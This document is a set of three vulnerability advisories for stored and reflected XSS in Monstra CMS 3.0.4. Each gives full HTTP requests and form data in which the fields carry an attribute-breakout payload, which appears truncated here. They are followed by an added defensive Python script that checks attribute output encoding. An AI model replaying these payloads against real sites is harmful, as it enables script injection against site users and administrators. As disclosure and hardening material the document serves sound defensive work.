# Exploit Title: [ Stored XSS at Monstra CMS 3.0.4 Install Page ]
# Date: [20.05.2018]
# Exploit Author: [Ismail Tasdelen]
# Vendor Homepage: [http://monstra.org/]
# Software Link: [ Monstra CMS ]
# Version: Monstra CMS 3.0.4
# Tested on: Windows 10 / Debian - XAMPP Web Server
# PoC : https://www.youtube.com/watch?v=AQweKapFzjI

# Stored XSS Payload : ">

# General :
Request URL: http://localhost/monstra-3.0.4/install.php?action=install
Request Method: POST
Status Code: 302 Found
Remote Address: [::1]:80
Referrer Policy: no-referrer-when-downgrade

# Response Headers :
Cache-Control: no-store, no-cache, must-revalidate
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Date: Mon, 21 May 2018 11:42:57 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Keep-Alive: timeout=5, max=100
location: index.php?install=done
Pragma: no-cache
Server: Apache/2.4.28 (Win32) OpenSSL/1.0.2l PHP/7.1.10
Transfer-Encoding: chunked
X-Powered-By: PHP/7.1.10

# Request Headers :
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
Cache-Control: max-age=0
Connection: keep-alive
Content-Length: 397
Content-Type: application/x-www-form-urlencoded
Cookie: _ga=GA1.1.462912790.1526777418; PHPSESSID=cf7161adcgd90rk4nsu2tne28v
Host: localhost
Origin: http://localhost
Referer: http://localhost/monstra-3.0.4/install.php?action=install
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900P Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.181 Mobile Safari/537.36

# Query String Parameters :
action: install

# Form Data :
php:
simplexml:
mod_rewrite:
install:
sitemap:
htaccess:
public:
storage:
backups:
tmp:
sitename: ">
siteurl: ">
login: ">
password: 123456
timezone: Kwajalein
email: test@ismailtasdelen.me
install_submit: Install

-----------------------------

# Exploit Title: [ Reflected XSS at Monstra CMS 3.0.4 Edit User Page ]
# Date: [20.05.2018]
# Exploit Author: [Ismail Tasdelen]
# Vendor Homepage: [http://monstra.org/]
# Software Link: [ Monstra CMS ]
# Version: Monstra CMS 3.0.4
# Tested on: Windows 10 / Debian - XAMPP Web Server
# PoC : https://www.youtube.com/watch?v=_79BdaaPAuc

# Reflected XSS Payload : ">

# General :
Request URL: http://localhost/monstra-3.0.4/users/1/edit
Request Method: POST
Status Code: 302 Found
Remote Address: [::1]:80
Referrer Policy: no-referrer-when-downgrade

# Response Headers :
Cache-Control: no-store, no-cache, must-revalidate
Connection: Keep-Alive
Content-Length: 3028
Content-Type: text/html; charset=UTF-8
Date: Mon, 21 May 2018 11:59:34 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Keep-Alive: timeout=5, max=99
Location: http://localhost/monstra-3.0.4/users/1
Pragma: no-cache
Server: Apache/2.4.28 (Win32) OpenSSL/1.0.2l PHP/7.1.10
X-Powered-By: PHP/7.1.10

# Request Headers :
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
Cache-Control: max-age=0
Connection: keep-alive
Content-Length: 668
Content-Type: application/x-www-form-urlencoded
Cookie: _ga=GA1.1.462912790.1526777418; PHPSESSID=cf7161adcgd90rk4nsu2tne28v; _gid=GA1.1.1813213397.1526902993
Host: localhost
Origin: http://localhost
Referer: http://localhost/monstra-3.0.4/users/1/edit
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900P Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.181 Mobile Safari/537.36

# Form Data :
csrf: 0542822c00801b440a8b47e941509f6aeec6e0be
user_id: 1
login: ">
firstname: ">
lastname: ">
email: ">
twitter: ">
skype: ">
about_me: ">
new_password: ">
edit_profile: Save

-----------------------------

# Exploit Title: [ Stored XSS at Monstra CMS 3.0.4 Page Publishing Page ]
# Date: [20.05.2018]
# Exploit Author: [Ismail Tasdelen]
# Vendor Homepage: [http://monstra.org/]
# Software Link: [ Monstra CMS ]
# Version: Monstra CMS 3.0.4
# Tested on: Windows 10 / Debian - XAMPP Web Server
# PoC : https://www.youtube.com/watch?v=j62EBTErvuU

# Stored XSS Payload : ">

# General :
Request URL: http://localhost/monstra-3.0.4/admin/index.php?id=pages&action=add_page
Request Method: POST
Status Code: 302 Found
Remote Address: [::1]:80
Referrer Policy: no-referrer-when-downgrade

# Response Headers :
Cache-Control: no-store, no-cache, must-revalidate
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Date: Mon, 21 May 2018 12:11:49 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Keep-Alive: timeout=5, max=100
Location: index.php?id=pages
Pragma: no-cache
Server: Apache/2.4.28 (Win32) OpenSSL/1.0.2l PHP/7.1.10
Transfer-Encoding: chunked
X-Powered-By: PHP/7.1.10

# Request Headers :
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
Cache-Control: max-age=0
Connection: keep-alive
Content-Length: 518
Content-Type: application/x-www-form-urlencoded
Cookie: _ga=GA1.1.462912790.1526777418; PHPSESSID=cf7161adcgd90rk4nsu2tne28v; _gid=GA1.1.1813213397.1526902993
Host: localhost
Origin: http://localhost
Referer: http://localhost/monstra-3.0.4/admin/index.php?id=pages&action=add_page
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900P Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.181 Mobile Safari/537.36

# Query String Parameters :
id: pages
action: add_page

# Form Data :
csrf: 0542822c00801b440a8b47e941509f6aeec6e0be
page_title: ">
page_name: ">
page_meta_title:
page_keywords:
page_description:
pages: 0
templates: index
status: published
access: public
editor: ">
page_tags: ">
add_page_and_exit: Save and Exit
page_date: 2018-05-22 00:11:1

# You want to follow my activity ?
https://www.linkedin.com/in/ismailtasdelen
https://github.com/ismailtasdelen
https://twitter.com/ismailtsdln
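All three advisories above submit the same attribute-breakout string (`">`) in form fields that the application later writes back into an HTML attribute, which is the root cause behind each of the stored and reflected findings. The Python script below is added here as an illustration and is not part of Ismail Tasdelen's advisory or of the Monstra CMS code base. It shows the check a defender wants: a submitted value must survive rendering into an `<input value="...">` attribute and parse back unchanged, with nothing leaking outside the tag. The field names come from the advisory's install-page form data; the sample request body, the two render functions (`render_unsafe`, `render_safe`) and the audit helper are constructed for the example.

```python
"""Attribute-context output-encoding check for form fields (added example).

Field names follow the Monstra CMS 3.0.4 advisory's install-page form data;
the request body below is constructed for this example, not captured traffic.
"""
import html
from html.parser import HTMLParser
from urllib.parse import parse_qs

# Constructed sample body: three text fields carry the advisory's breakout
# string ("%22%3E" is the URL encoding of '">'), one is blank, two are benign.
SAMPLE_BODY = (
    "sitename=%22%3E&siteurl=%22%3E&login=%22%3E"
    "&mod_rewrite=&password=123456&timezone=Kwajalein"
)


def render_unsafe(name: str, value: str) -> str:
    """Vulnerable pattern: the submitted value is concatenated straight into
    a quoted attribute, so a leading '"' closes the attribute early."""
    return f'<input type="text" name="{name}" value="{value}">'


def render_safe(name: str, value: str) -> str:
    """Hardened pattern: html.escape with quote=True encodes &, <, >, " and '
    so the value cannot terminate the attribute or the tag."""
    return (
        f'<input type="text" name="{html.escape(name, quote=True)}" '
        f'value="{html.escape(value, quote=True)}">'
    )


class _InputCollector(HTMLParser):
    """Minimal parser: records every <input> start tag and any text that ends
    up outside of tags (which is where a breakout would land)."""

    def __init__(self) -> None:
        super().__init__()
        self.inputs: list[dict] = []
        self.stray_text = ""

    def handle_starttag(self, tag, attrs):
        if tag == "input":
            self.inputs.append(dict(attrs))

    def handle_data(self, data):
        self.stray_text += data


def value_round_trips(rendered: str, expected_value: str) -> bool:
    """True when the rendered markup parses to exactly one <input> whose value
    attribute equals the submitted string and no text leaks outside the tag.
    HTMLParser decodes entity references in attribute values, so '&quot;&gt;'
    in the safe rendering comes back as the original '">'."""
    parser = _InputCollector()
    parser.feed(rendered)
    parser.close()
    return (
        len(parser.inputs) == 1
        and parser.inputs[0].get("value") == expected_value
        and parser.stray_text.strip() == ""
    )


def audit_form(body: str, renderer) -> list[str]:
    """Render every field of a URL-encoded form body with `renderer` and return
    the names of the fields whose value does not survive rendering intact."""
    broken = []
    for name, values in parse_qs(body, keep_blank_values=True).items():
        for value in values:
            if not value_round_trips(renderer(name, value), value):
                broken.append(name)
    return broken


if __name__ == "__main__":
    print("unsafe renderer breaks:", audit_form(SAMPLE_BODY, render_unsafe))
    print("safe renderer breaks:  ", audit_form(SAMPLE_BODY, render_safe))
```

Running the script reports `sitename`, `siteurl` and `login` as broken under the concatenating renderer and nothing under the escaping one; the blank and benign fields pass either way, which is why a round-trip check on the actual submitted data catches the defect while a blocklist of "bad characters" would not.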